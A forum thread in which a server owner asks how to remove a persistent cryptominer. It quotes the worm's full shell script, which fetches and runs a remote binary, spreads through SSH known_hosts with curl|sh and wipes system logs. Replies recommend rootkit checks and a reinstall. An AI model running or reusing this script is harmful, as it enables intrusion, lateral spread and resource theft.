V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
jieee
V2EX  ›  问与答

中了挖矿病毒,不会分析病毒二进制文件,怎么清除 crontab 里面任务?

  •  
  •   jieee · 2019-04-11 10:23:15 +08:00 · 3485 次点击
    这是一个创建于 2080 天前的主题,其中的信息可能已经有所发展或是发生改变。
    */15 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh
    ##
    

    执行 crontab -r,但还是会生成。

    ll /etc/cron.d
    -rw-r--r-- 1 root root 117 Apr 11 10:18 root
    

    这个文件随时在修改, vi 保存的时候提示 WARNING: The file has been changed since reading it!!!

    现在只能把 crontab 停止,然后重启机器。

    这是病毒脚本

    export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
    
    mkdir -p /tmp
    chmod 1777 /tmp
    rm -rf /tmp/go.sh
    rm -rf /tmp/go2.sh
    ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
    ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
    ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
    ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9
    apt-get install curl -y||yum install curl -y||apk add curl -y
    apt-get install cron -y||yum install crontabs -y||apk add cron -y
    systemctl start crond
    systemctl start cron
    systemctl start crontab
    service start crond
    service start cron
    service start crontab
    
    if [ ! -f "/tmp/.X11unix" ]; then
        ARCH=$(uname -m)
        if [ ${ARCH}x = "x86_64x" ]; then
            (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470365x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470365x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/t2D_WbHk -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/t2D_WbHk -O /tmp/kerberods) && chmod +x /tmp/kerberods
        elif [ ${ARCH}x = "i686x" ]; then
            (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
        else
            (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
        fi
            /tmp/kerberods
    elif [ ! -f "/proc/$(cat /tmp/.X11unix)/io" ]; then
        ARCH=$(uname -m)
        if [ ${ARCH}x = "x86_64x" ]; then
            (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470365x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470365x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/t2D_WbHk -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/t2D_WbHk -O /tmp/kerberods) && chmod +x /tmp/kerberods
        elif [ ${ARCH}x = "i686x" ]; then
            (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
        else
            (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
        fi
            /tmp/kerberods
    fi
    
    if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
      for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh >/dev/null 2>&1 &' & done
    fi
    
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    #
    
    6 条回复    2019-04-11 20:55:28 +08:00
    claysec
        1
    claysec  
       2019-04-11 13:12:14 +08:00   ❤️ 1
    检查下是否有 rookit 吧。还有命令都要检查一遍。最后重装系统。
    Acoffice
        2
    Acoffice  
       2019-04-11 13:34:51 +08:00 via Android   ❤️ 1
    这个病毒,之前论坛里已经有很多讨论了,腾讯和阿里都出了解决方案,搜一下就有答案了.....
    jieee
        3
    jieee  
    OP
       2019-04-11 16:57:04 +08:00
    @claysec
    @Acoffice

    谢谢,病毒文件名跟网上爆出的不一样,最终还是找到了病毒文件
    hmzt
        4
    hmzt  
       2019-04-11 17:10:42 +08:00
    你这个有点强势,我中的那个憨憨病毒因为没有 root 权限,直接 kill 掉连自启动都做不到
    deepdark
        5
    deepdark  
       2019-04-11 17:12:12 +08:00 via Android
    @hmzt 哈哈哈哈哈铁憨憨
    msg7086
        6
    msg7086  
       2019-04-11 20:55:28 +08:00
    如果你不能对系统里的所有文件进行排查,那么还是建议你重装系统。

    即使你今天发现了出问题的病毒文件,也不代表剩下的那些文件就没被改动过。
    可能过几天其它文件又让你系统后门大开了。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1000 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 20:11 · PVG 04:11 · LAX 12:11 · JFK 15:11
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.